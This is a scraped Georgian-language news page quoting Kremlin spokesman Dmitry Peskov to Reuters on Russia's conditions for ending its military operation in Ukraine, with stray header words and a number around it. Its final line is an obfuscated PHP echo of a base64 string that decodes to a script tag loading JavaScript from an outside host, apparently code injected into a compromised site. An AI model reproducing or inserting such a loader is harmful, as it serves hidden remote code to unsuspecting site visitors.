celsiusi
ავერსი შნაიდერი
რუსეთის პრეზიდენტის პრესმდივნის დიმიტრი პესკოვის განცხადებით, „რუსეთის ფედერაციის სამხედრო ოპერაცია შეიძლება შეწყდეს ნებისმიერ მომენტში“. ამის შესახებ მან საინფორმაციო სააგენტო „როიტერისთვის“ მიეცმულ ინტერვიუში განაცხადა და აღნიშნა, რომ ამისთვის ოფიციალურმა კიევმა რუსეთის მიერ განსაზღვრული პირობები უნდა შეასრულოს, რომელთა შორის არის უკრაინის მხრიდან სამხედრო მოქმედებების შეწყვეტა, კონსტიტუციაში ნეიტრალური სტატუსის გაწერა, ყირიმის რუსეთის შემადგენლობაში აღიარება და „ლუგანსკისა და დონეცკის სახალხო რესპუბლიკების“ დამოუკიდებლობის აღიარება.
 
„მათ უნდა შეიტანონ შესწორება კონსტიტუციაში, რომლის მიხედვითაც, უკრაინა უკუაგდებს ნებისმიერ ბლოკში გაწევრიანების ყოველგვარ მიზნებს. ჩვენ ასევე, ვისაუბრეთ იმაზე, რომ უკრაინამ უნდა აღიაროს ყირიმი რუსეთის ნაწილად და ამასთანავე, უნდა აღიარონ ლუგანსკისა და დონეცკის სახალხო რესპუბლიკების დამოუკიდებლობა. სულ ეს არის. ეს შეიძლება შეწყდეს ნებისმიერ მომენტში,“- განაცხადა პესკოვმა.
 
„როიტერის“ ცნობით, პესკოვმა აღნიშნა, რომ რუსეთი არ აპირებს უკრაინისთვის რაიმე სახის ახალი ტერიტორიული მოთხოვნის წაყენებას.
 
„ჩვენ სინამდვილეში ვასრულებთ უკრაინის დემილიტარიზაციას. ჩვენ მას დავასრულებთ. მაგრამ ყველაზე მთავარია, რომ უკრაინამ დაასრულოს მისი სამხედრო მოქმედებები. მათ უნდა შეწყვიტონ თავიანთი სამხედრო მოქმედებები და მაშინ აღარავინ აღარ ისვრის,“- განაცხადა პესკოვმა.
1036
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");